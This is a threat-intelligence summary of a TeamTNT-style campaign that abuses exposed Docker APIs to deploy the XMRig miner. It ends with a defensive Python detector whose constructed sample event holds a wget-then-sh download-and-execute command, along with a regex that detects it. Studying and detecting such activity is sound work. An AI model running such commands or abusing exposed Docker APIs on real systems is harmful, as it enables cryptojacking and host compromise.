Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: Trend Micro
Honeypot activity observed by Trend Micro researchers uncovers potentially new activity from the threat group TeamTNT, a group that has commonly exploited cloud and container environments to deploy coinminers. Despite TeamTNT posting on its website in November 2021 that the group had quit and ceased operations, recent activity mirrors techniques previously used by the threat group. This raises the possibility that the group has remained active or that a copycat group has emerged, imitating its tactics, techniques, and procedures (TTPs). Analysis of the threat activity begins with the exploitation of misconfigured Docker APIs over TCP. Tracing the source of the requests shows that the IP addresses initiating the activity primarily originate from China, with one German IP address observed. A review of the network traffic reveals the operators are using the ZGrab network scanner, based on the User-Agent field. When a successful response is received from an exposed endpoint, the threat actors initiate a request to "deploy an alpine-based container with instructions to download and execute the malicious shell script." The downloaded script performs many actions, such as modifying system utilities, clearing cronjobs, configuring network settings, creating new services, adding the attacker's SSH keys to root directories, hiding processes, and disabling security settings such as firewall rules and bash history. The scripted activity ultimately led to the deployment of the XMRig cryptocurrency miner, with additional scripts downloaded to facilitate lateral movement.
- Docker API Abuse & Container Created
- Unix File Download, Modified, Executed
Anvilogic Use Cases:
- Publicly exposed Docker API
- New Docker Container
- Rare shell script execution
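As an added illustration of the first two use cases above (not code from the Trend Micro report or Anvilogic), the following checks a Docker daemon.json for a TCP listener without TLS client verification, then scans container-create requests for the chain described in the summary: a ZGrab User-Agent, an alpine image, and a command that downloads and executes a script. The daemon.json contents, event field names, and IP addresses are constructed samples.

```python
import json
import re

# Constructed daemon.json contents: one exposed over plain TCP, one with TLS client verification.
DAEMON_EXPOSED = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
DAEMON_TLS = ('{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],'
              ' "tlsverify": true, "tlscacert": "/etc/docker/ca.pem"}')

# Constructed container-create events, one JSON object per line, as an API gateway or audit
# collector in front of the daemon might record them (field names are assumed, not Docker's own).
EVENTS = "\n".join([
    '{"src": "203.0.113.10", "ua": "Mozilla/5.0 zgrab/0.x", "path": "/containers/create",'
    ' "body": {"Image": "alpine", "Cmd": ["sh", "-c", "wget -q -O /tmp/x.sh http://203.0.113.10/x.sh; sh /tmp/x.sh"]}}',
    '{"src": "10.0.0.5", "ua": "Docker-Client/24.0.5 (linux)", "path": "/containers/create",'
    ' "body": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]}}',
])

# wget/curl followed by a shell invocation via pipe, ';' or '&&' (download-and-execute).
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl)\b.*(\|\s*(ba)?sh|;\s*(ba)?sh\s|&&\s*(ba)?sh\s)", re.I)

def exposed_tcp_listeners(daemon_json_text):
    """Return tcp:// listeners that accept API calls without TLS client verification."""
    cfg = json.loads(daemon_json_text)
    if cfg.get("tlsverify") is True:
        return []
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]

def flag_container_create(event):
    """Return the indicators a single container-create request matches."""
    reasons = []
    if "zgrab" in event.get("ua", "").lower():
        reasons.append("zgrab user-agent")
    body = event.get("body", {})
    if body.get("Image", "").split(":")[0] == "alpine":
        reasons.append("alpine image")
    if DOWNLOAD_EXEC.search(" ".join(body.get("Cmd", []))):
        reasons.append("download-and-execute command")
    return reasons

def scan_events(lines):
    """Return (source IP, indicators) for create requests with at least two indicators."""
    hits = []
    for line in lines.splitlines():
        ev = json.loads(line)
        if ev.get("path") != "/containers/create":
            continue
        reasons = flag_container_create(ev)
        if len(reasons) >= 2:
            hits.append((ev["src"], reasons))
    return hits

if __name__ == "__main__":
    print(exposed_tcp_listeners(DAEMON_EXPOSED))
    print(scan_events(EVENTS))
```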